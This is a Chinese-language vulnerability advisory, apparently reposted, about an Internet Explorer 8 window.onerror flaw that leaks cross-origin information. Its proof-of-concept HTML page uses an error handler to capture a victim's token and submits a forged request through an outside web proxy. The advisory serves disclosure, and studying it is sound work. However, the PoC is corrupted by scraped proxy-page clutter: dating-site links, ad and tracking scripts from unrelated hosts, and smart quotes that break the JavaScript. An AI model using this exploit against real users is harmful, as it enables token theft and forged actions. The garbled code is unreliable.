受影响系统:
Microsoft Internet Explorer 8.0
描述:
Internet Explorer是Windows操作系统中默认捆绑的WEB浏览器。
Internet Explorer支持window.onerror回调,在出现Javascript解析或运行时错误时就会触发这个回调。但即使www.evil.com已经注册了自己的window.onerror处理器并之后使用<script src="http://www.bank.com/">, 也会触发这个回调,导致从其他网页泄露某些信息。
<*来源:Chris Evans (chris@ferret.lmh.ox.ac.uk)
链接:http://secunia.com/advisories/41944/
http://scarybeastsecurity.blogspot.com/2010/10/minor-leak-major-headache.html
*>
测试方法:
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<html>
<head> <script type="text/javascript">ginf={url:’http://www.34baidu.info/proxyie’,script:’browse.php’,target:{h:’http://scary.beasts.org’,p:’/misc/’,b:”},enc:{u:’fbb19e2a81c10a0384f’,e:’1′,p:”},b:’1′}</script>
<script type="text/javascript" src="http://www.34baidu.info/proxyie/includes/main.js"></script>
<script>
window.onerror = function(msg, url, linenumber) {
var i = msg.indexOf("’");
if (i == -1) {
alert("Opening quote missing.");
}
msg = msg.substring(i + 1);
i = msg.indexOf("’");
if (i == -1) {
alert("Closing quote missing.");
}
msg = msg.substring(0, i);
if (msg.length != 22) {
document.location.reload();
}
document.getElementById(‘here’).value = msg;
}
</script>
</head>
<body><div style="padding:4px;margin-bottom:2px;background:#eee;font:12px Verdana,Arial,Tahoma;color:#000;">
<form action="includes/process.php?action=update" method="post" style="padding:0;margin:0;">
<b>URL:</b> <input type="text" name="u" size="30" value="http://scary.beasts.org/misc/reader.html" style="width:400px;border: 1px solid #447900;">
<input type="submit" value="Go">
[<a href="http://asiafriendfinder.com/search/g1134918-pmem.sub1?18PG=1&find_sex=1&ip=auto&looking_for_person=2&photo=2&race=0&show_city=1&lang=gb">找男性约会</a>]
[<a href="http://asiafriendfinder.com/search/g1134918-pmem.sub1?18PG=1&find_sex=2&ip=auto&looking_for_person=1&photo=2&race=0&show_city=1&lang=gb">找女性约会</a>]
<br>
<b>Options:</b>
<input type="checkbox" name="encodeURL" id="encodeURL" checked="checked" >
<label for="encodeURL" style="display:inline;">加密URL</label> <input type="checkbox" name="encodePage" id="encodePage">
<label for="encodePage" style="display:inline;">加密网页</label> <input type="checkbox" name="allowCookies" id="allowCookies">
<label for="allowCookies" style="display:inline;">允许Cookies</label> <input type="checkbox" name="stripJS" id="stripJS">
<label for="stripJS" style="display:inline;">去除JavaScripts</label> <input type="checkbox" name="stripObjects" id="stripObjects">
<label for="stripObjects" style="display:inline;">去除Objects</label>
</form>
<!– Begin Publisher Code for bropass.com –>
<!– End Publisher Code –>
<!–proxified within form–>
<!–end proxified within form–>
<script language=’javascript’ type=’text/javascript’ src=’http://v.naqigs.com/Position/javas/CPM_4665_54405.js’></script>
</div>
<!–proxified below form–>
<center>
<script type="text/javascript" src="http://js.tongji.linezing.com/1496311/tongji.js"></script><noscript><a href="http://www.linezing.com"><img src="http://img.tongji.linezing.com/1496311/tongji.gif"/></a></noscript>
</center>
<!–end proxified below form–>
<button onclick="document.getElementById(‘form’).submit()">CLICK TO GET YOUR GOAT ON – THIS COULD BE AUTOMATED</button>
<form id="form" action="http://www.34baidu.info/proxyie/browse.php?u=fbb19e2a81c10a0384fOi8vd3d3Lmdvb2dsZS5jb20vcmVhZGVyL2FwaS8wL3N1YnNjcmlwdGlvbi9lZGl0P3NvdXJjZT1GRUVEX0ZJTkRFUl9TRUFSQ0hfUkVTVUxUJmNsaWVudD1zY3JvbGw%3D&b=1" method="POST">
<input size=80 type="text" name="s" value="feed/http://beginningfarmers.org/feed/"/>
<p>
<input size=20 type="text" name="ac" value="subscribe"/>
<p>
<input size=20 type="text" name="t" value="About Goat Farming | Beginning Farmers"/>
<p>
<input size=40 type="text" id="here" name="T" value="value pending"/>
</form>
</body>
</html>
建议:
厂商补丁:
Microsoft
———
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
0 条评论。